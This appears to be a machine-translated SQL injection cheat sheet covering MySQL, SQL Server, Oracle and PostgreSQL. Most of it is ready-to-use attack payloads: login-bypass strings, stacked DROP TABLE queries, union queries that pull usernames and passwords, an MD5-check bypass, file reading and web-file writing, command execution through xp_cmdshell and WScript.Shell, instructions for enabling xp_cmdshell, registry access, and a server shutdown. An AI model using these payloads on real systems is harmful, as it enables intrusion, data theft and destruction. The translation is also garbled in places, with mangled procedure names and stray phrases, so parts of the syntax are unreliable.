SQL injection quick query table (on)

SQL injection quick query table (on)

0x00 SQL injection quick query table

Currently, only MySQL, Microsoft SQL Server, and some ORACLE and PostgreSQL are supported. Most examples do not guarantee that each scenario is applicable. In actual scenarios, various inserting languages, different code environments, and a variety of uncommon or even odd SQL statements often change.

The example is only used for readers to understand the basic concept of "a potential attack", and almost every part has a concise summary.

M: MySQL S: SQL Server P: PostgreSQL O: Oracle +: (probably) All other databases

Example:

(MS) representatives: MySQL, SQL Server, etc. (M * S) representatives: only for some versions or some special circumstances attached to the following MySQL, and SQL Server0x01 directory For SQL injection quick query table syntax reference, attack example and injection tips line comment use line comment SQL Injection Attack example line comment use line comment injection attack example MySQL version test attack example stack Query) languages that support stack query/databases for MySQL and PHP stack injection attack example If statement MySQL If statement SQL Server If statement use If statement injection attack example INTEGER (Integers) use a hex injection attack sample string (Modification) contact Union injection UNION-language problem handling bypass logon interface (SMO +) bypass MD5 hash check login interface bypass MD5 hash check example (MSP) Error-Based) -Use HAVING to detect Field Names (S) in SELECT queries using order by (MSO +) data Type, UNION, and so on to obtain the field type simple injection (MSO +) useful functions, information collection, built-in programs, a large number of injection notes @ version (MS) file Insert (Bulk Insert) (S) BCP (S) VBS/WSH (S) of SQL Server execute system commands, some special tables (S) in xp_mongoshell (S) SQL Server) other SQL Server built-in programs (S) a large number of MSSQL Notes use LIMIT (M) or ORDER (MSO) injection to turn off SQL Server (S) in SQL Server 2005, enable xp_javasshell to detect the structure (S) of the SQL Server database, get the User-Defined table, get the field name, move the records (S), and quickly remove the Error-Based) SQL Server injection (S) 0x02 syntax reference, attack samples and injection tips Line comment

Comment out the rest of the query statement

Line comment is usually used to comment out the rest of the query statement, so you do not need to fix the entire syntax.

-- (SM)

DROP sampletable ;--

# (M)

DROP sampletable ;#

Example of SQL injection attacks using line comment

Username: admin '--

Statement: SELECT * FROM members WHERE username = 'admin' -- 'AND password = 'Password'. This will allow you to log on as admin, because other SQL statements are commented out. Intra-row comment

Comment out the rest of the query statement without closing the comment, or use it to bypass filtering, remove spaces, obfuscation, or detect the database version.

/* Comment */(SM)

DROP/* comment */sampletable DR/**/OP/* bypass filtering */sampletable SELECT/* replace space */password/**/FROM/**/Members

/*! MYSQL exclusive */(M)

This is an exclusive MySQL syntax. It is ideal for detecting MySQL versions. If you write code in the comment, only MySQL will execute it. You can also use this method to execute some code only on servers later than a certain version. SELECT /*! 32302 1/0, */1 FROM tablename

Injection Attack example using intra-row annotations

ID: 10; drop table members /*

You can also use 10; drop table members --

 

Example of MySQL Attack Detection

SELECT /*! 32302 1/0, */1 FROM tablename

If MySQL version is higher than 3.23.02, a division by 0 error is thrown.

ID :/*! 32302 10 */

ID: 10

If the MySQL version is later than 3.23.02, you will get the same result for the above two queries.

Stacking Queries)

Execute multiple query statements in the code, which is very useful in every injection point, especially for SQL Server back-end applications.

; (S) SELECT * FROM members; DROP members -- end a query and start a new query. Languages/databases that support stack Query

Green: supported, dark gray: not supported, light gray: Unknown

About MySQL and PHP

Clarify some issues.

PHP-MySQL does not support stack query, and Java does not support stack query (I am very clear about ORACLE, and I am not sure about others ). In general, MySQL supports stack query, but most database layers of the PHP-Mysql application framework cannot execute the second query. Maybe the MySQL client supports this. I'm not sure. Can someone confirm it?

(Translator's note: clients in MySQL 5.6.20 support stack query)

Stack injection attack example

ID: 10; DROP members --

Statement: SELECT * FROM products WHERE id = 10; DROP members --

After a normal query is executed, the DROP query is executed.

If statement

Obtain a response based on the If statement. This is one of the keys to Blind Injection (Blind SQL Injection). It can also perform some tests simply and accurately.

MySQL If statement

IF (condition, true-part, false-part) (M)

Select if (1 = 1, 'true', 'false ')

SQL Server If statement

IF condition true-part ELSE false-part (S)

IF (1 = 1) SELECT 'true' else select 'false'

Example of If statement injection attacks

If (select user) = 'sa 'OR (select user) = 'dbo') select 1 else select 1/0 (S)

If the current user is not "sa" or "dbo", a divide by zero error is thrown.

Integer

It is very useful for bypassing, such as magic_quotes () and other similar filters, and even various WAF.

0 xHEXNUMBER (SM)

(HEXNUMBER: hexadecimal number) You can use hexadecimal number as follows:

Select char (0x66) (S)

SELECT 0x5045 (M) (this is not an integer but a hexadecimal string)

SELECT 0x50 + 0x45 (M) (now this is an integer)

String operation

String-related operations. This is useful for constructing a database that does not contain quotation marks and is used to bypass or detect databases.

String concatenation

+ (S)

SELECT login + '-' + password FROM members

| (* MO)

SELECT login | '-' | password FROM members

* For MySQL, "|" is only executed in ANSI mode. In other cases, it is treated as a 'logical operator 'and a 0 value is returned. A better way is to use the CONCAT () function.

CONCAT (str1, str2, str3,...) (M)

All strings in the connection parameters: select concat (login, password) FROM members

String without quotation marks

There are many methods that use strings, but these methods are always available. Use CHAR () (MS) and CONCAT () (M) to generate a string without quotation marks

0x457578 (M)-hexadecimal encoded string

SELECT 0x457578

This will be processed as a string in MySQL.

A simple way to use a hexadecimal string in MySQL: select concat ('0x ', HEX ('C: \ boot. ini '))

Use the CONCAT () function in MySQL: select concat (CHAR (75), CHAR (76), CHAR (77) (M)

This will return 'klm'

Select char (75) + CHAR (76) + CHAR (77) (S)

This will return 'klm'

Example of a hex Injection Attack

SELECT LOAD_FILE (0x633A5C626F6F742E696E69) (M)

This will display the content of c: \ boot. ini

Modification and association

ASCII () (SMP)

Returns the ASCII value of the leftmost character. This is an important function for blind injection.

Example: select ascii ('A ')

CHAR () (SM)

Converts an integer to an ASCII character.

Example: select char (64)

Union Injection

With union, you can perform queries across tables. The simplest way is to inject a query so that it returns the content of another table. SELECT header, txt FROM news union all select name, pass FROM members

This will merge the contents of the news table and members table and return them.

Another example: 'Union SELECT 1, 'anotheruser', 'doesnt matter ', 1 --

UNION-language troubleshooting

When you use Union to inject data, you will often encounter some errors because of the settings of different languages (table settings, field settings, table or database settings, etc ). These methods are useful for solving those problems, especially when you are dealing with Japanese, Russian, and Turkish.

Use COLLATE SQL _Latin1_General_Cp1254_CS_AS (S)

Or other statements. Check the SQL Server documentation by yourself. Example: SELECT header FROM news union all select name COLLATE SQL _Latin1_General_Cp1254_CS_AS FROM members

Hex () (M)

Baishi bailing ~

Bypass the logon interface (SMO +)

 

SQL Injection formula 101 (probably the original name ?), Logon tips

Admin' -- admin' # admin'/* 'or 1 = 1 --' or 1 = 1 # 'or 1 = 1 /*') or '1' = '1 -- ') or ('1' = '1 --.... log On with different users (SM *) 'Union SELECT 1, 'anotheruser', 'doesnt matter ', 1 --

** Earlier versions of MySQL do not support union *

Attackers can bypass the MD5 hash check logon interface.

If the application first reads the MD5 of the password through the user name and then compares it with the MD5 of the password you provided, you need some additional skills to bypass verification. You can submit an MD5 hash of known plain text with its plain text so that the program does not use the hash read from the database and compares it with the hash provided by you.

Example of bypassing the MD5 hash check (MSP)

Username: admin

Password: 1234 'AND 1 = 0 union all select 'admin', '81dc9bdb52d04dc20036dbd8313ed055

81dc9bdb52d04dc20036dbd8313ed055 = MD5 (1234)

Error-Based field names use HAVING to detect Field Names (S) 'having 1 = 1 -- 'group BY table. columnfromerror1 HAVING 1 = 1 -- 'group BY table. columnfromerror1, columnfromerror2 HAVING 1 = 1 --...... 'Group BY table. columnfromerror1, columnfromerror2, columnfromerror (n) HAVING 1 = 1 -- until it no longer reports an error, even if it is done in the SELECT query, use the order by test field number (MSO +)

Using order by to detect the number of fields can speed up union injection.

Order by 1 -- order by 2 --...... Order by n -- until it returns an error, the number of the last successful field is. Data Type, UNION

Tip:

UNION is often used with ALL, because fields with the same value are often used. By default, UNION attempts to return a unique value (records with distinct). If you only have one record for each query, instead of occupying this valuable record bit for records that are originally normally queried, you can use-1 or a value that does not exist at all to handle the original query (provided that the injection point is in WHERE ). NULL is used in UNION. For most data types, this method is better than blind injection of string, date, number, and so on. Be careful when judging whether the error is from the application or from the database. Because ASP. NET often throws errors when you use NULL (because developers generally did not expect NULL in the username box) to obtain the field type.

'Union select sum (columntofind) from users -- (S)

Microsoft ole db Provider for ODBC Drivers error '80040e07 '[Microsoft] [odbc SQL Server Driver] [SQL Server] The sum or average aggregate operation cannot take a ** varchar ** data type as an argument. if no error is returned, the field is Numeric.

Similarly, you can use CAST () and CONVERT ()

SELECT * FROM Table1 WHERE id =-1 union all select null, null, NULL, NULL, convert (image, 1), null, null, NULL, NULL, NULl, NULL --

(11223344) union select null, null where 1 = 2 --

No error is reported-the syntax is correct. This is the syntax of ms SQL Server. Continue.

(11223344) union select 1, null where 1 = 2 --

No error is reported-the first field is of the integer type.

11223344) union select 1, 2, NULL, null where 1 = 2 --

Error-the second field is not of integer type

(11223344) union select 1, '2', NULL, null where 1 = 2 --

No error is reported-the second field is of the string type.

(11223344) union select 1, '2', 3, null where 1 = 2 --

Error-the third field is not an integer

......

Microsoft ole db Provider for SQL Server error '80040e07 'Explicit conversion from data type int to image is not allowed.

Before you encounter a union error, you will first encounter a convert () error, so use convert () and then use union

Simple injection (MSO +)

'; Insert into users values (1, 'hax0r', 'coolpass', 9 )/*

Useful functions, information collection, built-in programs, a large number of injection notes @ version (MS)

Database version. This is a constant. You can use it as a field for SELECT, and you do not need to provide the table name. You can also use the INSERT/UPDATE statements or even functions.

Insert into members (id, user, pass) VALUES (1, ''+ SUBSTRING (@ version, 1, 10), 10)

File Insert (Bulk Insert) (S)

Insert the file content into the table. If you do not know the application directory, you can read IIS metabase file (IIS 6 only) (% systemroot % \ system32 \ inetsrv \ MetaBase. xml) and find the application directory in it.

Create a table foo (line varchar (8000) bulk insert foo FROM 'C: \ inetpub \ wwwroot \ login. asp 'and repeat another file BCP (S)

Write files. This function requires logging on to bcp "SELECT * FROM test.. foo" queryout c: \ inetpub \ wwwroot \ runcommand. asp-c-Slocalhost-Usa-Pfoobar

SQL Server VBS/WSH (S)

With ActiveX support, you can use VBS/WSH in SQL Server

Declare @ o int exec sp_oacreate 'wscript. shell', @ o out exec sp_oamethod @ o, 'run', NULL, 'notepad.exe'

Username: '; declare @ o int exec sp_oacreate 'wscript. shell', @ o out exec sp_oamethod @ o, 'run', NULL, 'notepad.exe '--

Run the system command, xp_mongoshell (S)

As we all know, SQL Server 2005 is disabled by default. You need admin permission

EXEC master. dbo. xp_mongoshell 'cmd.exe dir c :'

Ping a simple test. Check the firewall and sniffer before using it.

EXEC master. dbo. xp_mongoshell 'ping'

If there is an error, or union or something else, you cannot directly read the result.

Some special tables in SQL Server (S)

Error Messages

Master .. sysmessages

Linked Servers

Master .. sysservers

Password (both versions 2000 and 2005 can be cracked. These two encryption algorithms are similar)

SQL Server 2000: masters... sysxlogins

SQL Server 2005: sys. SQL _logins

Other SQL Server built-in programs (S)

Command Execution (xp_cmdshell)

Exec master .. xp_mongoshell 'dir'

Registry operation (xp_regread)

Xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring

Xp_regwrite

Exec xp_regread HKEY_LOCAL_MACHINE, 'System \ CurrentControlSet \ Services \ lanmanserver \ parameters ', 'nullsessionshares' exec 1_hkey_local_machine, 'System \ CurrentControlSet \ Services \ snmp \ parameters \ validcommunities'

Management Service (xp_servicecontrol)

Media (xp_availablemedia)

ODBC resources (xp_enumdsn)

Log on to (xp_loginconfig) and create the Cab file (xp_makecab) Domain Name List (xp_ntsec_enumdomains) to kill the process (need PID) (xp_terminate_process)

Create a process (you can do whatever you want)

Sp_addextendedproc 'xp _ webserver', 'c: \ temp \ x. dll 'exec xp_webserver

Write the file to UNC or internal path (sp_makewebtask)

A large number of MSSQL notes

SELECT * FROM master .. sysprocesses/* WHERE spid = @ SPID */

DECLARE @ result int; EXEC @ result = xp_cmdshell 'dir *. exe '; IF (@ result = 0) SELECT 0 else select 1/0

HOST_NAME () IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)

INSERT tbl EXEC master .. xp_mongoshell OSQL/Q "dbcc showcontig"

OPENROWSET (Transact-SQL)-http://msdn2.microsoft.com/en-us/library/ms190312.aspx

You cannot use the subquery (sub select) in the Insert query of SQL Server ).

Use LIMIT (M) or ORDER (MSO) Injection

SELECT id, product FROM test. test t LIMIT 0, 0 union all select 1, 'x'/*, 10;

If the injection point is in the second parameter of LIMIT, you can comment it out or use union injection.

Turn Off SQL Server (S)

If you are really anxious, '; shutdown --

Enable xp_cmdshell in SQL Server 2005

By default, SQL Server 2005, such as xp_cmdshell and other dangerous built-in programs, are disabled. If you have admin permissions, you can start them.

'\ EXEC sp_configure 'show advanced options', 1 RECONFIGURE

EXEC sp_configure 'xp _ Your shell', 1 RECONFIGURE '\

Test the SQL Server database structure (S) to obtain the User-Defined table

SELECT name FROM sysobjects WHERE xtype = 'U'

Obtain the field name

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames ')

Moving records (S)

Modify WHERE to use not in or not exist... WHERE users not in ('first user', 'second user') select top 1 name FROM members where not exist (select top 0 name FROM members) -- this is useful

Dirty tips

SELECT * FROM Product where id = 2 AND 1 = CAST (Select p. name from (select count (I. id) AS rid FROM sysobjects I WHERE I. id <= o. id) AS x, name from sysobjects o) as p where p. x = 3) as int

Select p. name from (select count (I. id) AS rid FROM sysobjects I WHERE xtype = 'U' and I. id <= o. id) AS x, name from sysobjects o WHERE o. xtype = 'U') as p where p. x = 21

Quickly remove Error-Based SQL Server injection (S)

'; Begin declare @ rt varchar (8000) SET @ rd = ': 'select @ rd = @ rd + ''+ name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'members ') AND name> @ rd SELECT @ rd AS rd into TMP_SYS_TMP end ;--